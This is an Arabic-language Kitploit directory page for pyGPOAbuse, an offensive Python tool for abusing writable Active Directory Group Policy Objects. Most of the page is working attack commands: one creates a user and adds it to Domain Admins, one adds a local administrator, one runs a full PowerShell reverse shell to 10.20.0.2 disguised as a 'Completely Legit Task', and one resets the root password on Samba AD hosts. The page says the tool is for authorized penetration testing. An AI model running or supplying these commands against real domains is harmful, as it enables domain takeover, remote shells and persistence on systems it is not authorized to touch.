Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
pyGPOAbuse — تنفيذ جزئي بلغة Python لأداة SharpGPOAbuse | Kitploit
أدوات/GitHubGitHub/hackndo/pygpoabuse
تصعيد الامتيازاتالاستغلالالحركة الجانبيةما بعد الاستغلالاختبار الاختراق
GitHubhackndo/pygpoabuse

pyGPOAbuse

تنفيذ جزئي بلغة Python لأداة SharpGPOAbuse

عرض المستودع
585711منذ 2 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

pyGPOAbuse

إضافات التصفية بواسطة D4RKMATT3R

  • إخلاء مسؤولية: تم اختبار هذا لفترة وجيزة فقط في بيئة محلية لـ Active Directory، ولا أتحمل أي مسؤولية عن أي سلوك غير متوقع أو عطل، ويُقدم كما هو، للاختبار المصرح به فقط، على مسؤوليتك الشخصية بالكامل.
  • يدعم الآن استهدافًا مُرشحًا للمستخدمين أو المضيفين مشابهًا لـ SharpGPOAbuse
  • السيناريو: يتم ربط GPO بمجال Active-Directory، وبالتالي سيتم تطبيق المهام على جميع الكائنات المتأثرة داخل هذا المجال (المستخدمين/المضيفين) مما سيترك قدرًا هائلاً من الضوضاء والآثار غير الضرورية. لذلك يُفضل اتباع نهج أكثر استهدافًا لتنفيذ الأوامر على أهداف محددة مثل وحدة التحكم بالمجال.
root@kitploit:~
Host/User targeting via filters (mirrors SharpGPOAbuse --FilterEnabled):
  -filter-enabled       Enable GPO Host/User targeting so the scheduled task only runs for a specific host/user
  -target-dns-name FQDN
                        Computer task: DNS/FQDN of the only host that should run the task (e.g. dc01.corp.local)
  -target-username DOMAIN\USER
                        User task: only this user processes the task (format: DOMAIN\username)
  -target-user-sid SID  User task: SID of the targeted user (optional, more robust matching)

مثال

root@kitploit:~
# Add Domain user and add to Domain Admins via Domain-Controller
python3 pygpoabuse.py red.local/user:Testing123 -gpo-id D9A65E7F-112D-49B9-AF7A-4FC2BA092BF6 -taskname SecurityUpdate  -dc-ip 192.168.152.2 -command 'net user UserGPO P@ssw0rd /add && net group "Domain Admins" UserGPO /add' -filter-enabled -target-dns-name dc01.red.local

الوصف

تنفيذ جزئي بلغة Python لـ SharpGPOAbuse بواسطة @pkb1s

يمكن استخدام هذه الأداة عندما يكون بإمكان حساب خاضع للتحكم تعديل GPO موجود يطبق على مستخدم أو أكثر وأجهزة كمبيوتر. ستقوم بإنشاء مهمة مجدولة فورية كـ SYSTEM على الكمبيوتر البعيد لـ GPO الخاص بالكمبيوتر، أو كمستخدم مسجل الدخول لـ GPO الخاص بالمستخدم.

السلوك الافتراضي يضيف مسؤولاً محليًا.

Example

كيفية الاستخدام

الاستخدام الأساسي

إضافة مستخدم john إلى مجموعة المسؤولين المحليين (كلمة المرور: H4x00r123..)

root@kitploit:~
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

الاستخدام المتقدم

مثال على شل عكسي

root@kitploit:~
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    -powershell \ 
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \ 
    -user

التنظيف

حذف المهمة المجدولة بعد تنفيذها.

root@kitploit:~
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" --cleanup

استخدام Samba AD

يمكن أيضًا استخدام هذه الأداة مع مجالات Samba AD. ستقوم بإنشاء مهمة فورية كـ root على الكمبيوتر البعيد لـ GPO الخاص بالكمبيوتر.

أولاً، قم بإنشاء نص Bash أو ملف ELF.

root@kitploit:~
#!/bin/bash
echo "root:1234" | chpasswd

ثم قم بتنفيذ الأداة باستخدام الوسيط --linux-exec.

root@kitploit:~
./pygpoabuse.py DOMAIN/user:password -gpo-id "12345677-ABCD-9876-ABCD-123456789012" --linux-exec /path/to/executable

Example

الاعتمادات

  • @pkb1s لـ SharpGPOAbuse
  • @airman604 لـ schtask_now.py
  • @SkelSec لـ msldap
تنزيل الأداة